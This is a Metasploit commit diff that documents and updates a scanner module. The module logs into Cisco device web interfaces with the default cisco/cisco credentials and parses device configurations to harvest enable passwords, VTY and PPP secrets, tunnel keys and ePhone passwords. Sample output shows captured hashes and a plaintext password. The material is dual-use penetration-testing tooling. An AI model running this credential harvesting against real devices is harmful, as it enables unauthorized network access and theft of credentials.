Land #10798, Cisco device manager update

4.x
Jeffrey Martin 2018-12-03 01:39:19 -06:00 committed by Metasploit
parent 16184573cc
commit 73724f111b
3 changed files with 83 additions and 16 deletions


@ -0,0 +1,47 @@
## Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
## Vulnerable Application
Any Cisco networking device with the HTTP inteface turned on.
## Verification Steps
1. Enable the web interface on a cisco device `ip http server`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
4. Do: ```set RHOSTS [IP]```
5. Do: ```run```
## Options
**HttpUsername**
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
Password to use for basic authentication. Default value is `cisco`
## Scenarios
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > use auxiliary/scanner/http/cisco_device_manager
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf5 auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -71,7 +71,7 @@ module Auxiliary::Cisco
def cisco_ios_config_eater(thost, tport, config)
credential_data = {
address: thost,
port: tport,
@ -125,7 +125,7 @@ module Auxiliary::Cisco
shash = cisco_ios_decrypt7(shash) rescue shash
print_good("#{thost}:#{tport} Decrypted Enable Password: #{shash}")
store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")
cred = credential_data.dup
cred[:private_data] = shash
cred[:private_type] = :password
@ -168,27 +168,27 @@ module Auxiliary::Cisco
spass = cisco_ios_decrypt7(spass) rescue spass
print_good("#{thost}:#{tport} Decrypted VTY Password: #{spass}")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :password
create_credential_and_login(cred)
when /^\s*(password|secret) 5 (.*)/i
shash = $2.strip
print_good("#{thost}:#{tport} MD5 Encrypted VTY Password: #{shash}")
store_loot("cisco.ios.vty_password", "text/plain", thost, shash, "vty_password_hash.txt", "Cisco IOS VTY Password Hash (MD5)")
cred = credential_data.dup
cred[:private_data] = shash
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*password (0 |)([^\s]+)/i
spass = $2.strip
print_good("#{thost}:#{tport} Unencrypted VTY Password: #{spass}")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
@ -249,7 +249,7 @@ module Auxiliary::Cisco
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*interface tunnel(\d+)/i
tuniface = $1
@ -259,24 +259,24 @@ module Auxiliary::Cisco
print_good("#{thost}:#{tport} GRE Tunnel Key #{spass} for Interface Tunnel #{siface}")
store_loot("cisco.ios.gre_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "gre_tunnel_key.txt", "Cisco GRE Tunnel Key")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*ip nhrp authentication ([^\s]+)/i
spass = $1
siface = tuniface
print_good("#{thost}:#{tport} NHRP Authentication Key #{spass} for Interface Tunnel #{siface}")
store_loot("cisco.ios.nhrp_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "nhrp_tunnel_key.txt", "Cisco NHRP Authentication Key")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
#
# Various authentication secrets
@ -317,6 +317,20 @@ module Auxiliary::Cisco
create_credential_and_login(cred)
end
# This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
# username "phonefour" password 444444
# username test password test
# This is used for the voicemail system
when /^\s*username (?:")([^\s]+)(?:") password ([^\s]+)/i
user = $1
spass = $2
print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
user = $1
stype = $3.to_i
@ -361,7 +375,7 @@ module Auxiliary::Cisco
if stype == 5
print_good("#{thost}:#{tport} PPP Username #{suser} MD5 Encrypted Password: #{spass}")
store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
@ -371,7 +385,7 @@ module Auxiliary::Cisco
if stype == 0
print_good("#{thost}:#{tport} PPP Username: #{suser} Password: #{spass}")
store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
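Review bot: In the -317 hunk the new ePhone branch records a cleartext secret as `cred[:private_type] = :nonreplayable_hash`, although the value captured from a line like `username "phonefour" password 444444` is the plain password; the decrypted enable-password branch earlier in this method uses `:password` for the same kind of value, so this line should read `cred[:private_type] = :password` so the stored credential is typed as replayable. The comment above the regex also lists `username test password test` as a matched form, but `(?:")([^\s]+)(?:")` requires the double quotes, so that unquoted line never reaches this branch, and loosening the quotes is not a safe fix because this `when` sits before the `username ... (secret|password) (\d+)` branches and would then capture the type digit as the password; correcting the comment is the better option, e.g. `# Only the quoted form (username "name" password secret) is matched here.` The abbreviation in that comment also looks off — Communications Manager Express is usually CME, with CUE being Unity Express — worth confirming before landing. The enclosing `cisco_ios_config_eater` method starts and ends outside this hunk.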


@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The USERNAME and PASSWORD options can be used to specify
web interface exposed. The HttpUsername and HttpPassword options can be used to specify
authentication.
},
'Author' => [ 'hdm' ],
@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary
[ 'OSVDB', '444'],
],
'DisclosureDate' => 'Oct 26 2000'))
register_options(
[
OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),
OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])
])
end
def run_host(ip)
@ -54,9 +59,10 @@ class MetasploitModule < Msf::Auxiliary
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
# Report a vulnerability only if no password was specified
if datastore['PASSWORD'].to_s.length == 0
if datastore['HttpPassword'].to_s.length == 0
report_vuln(
{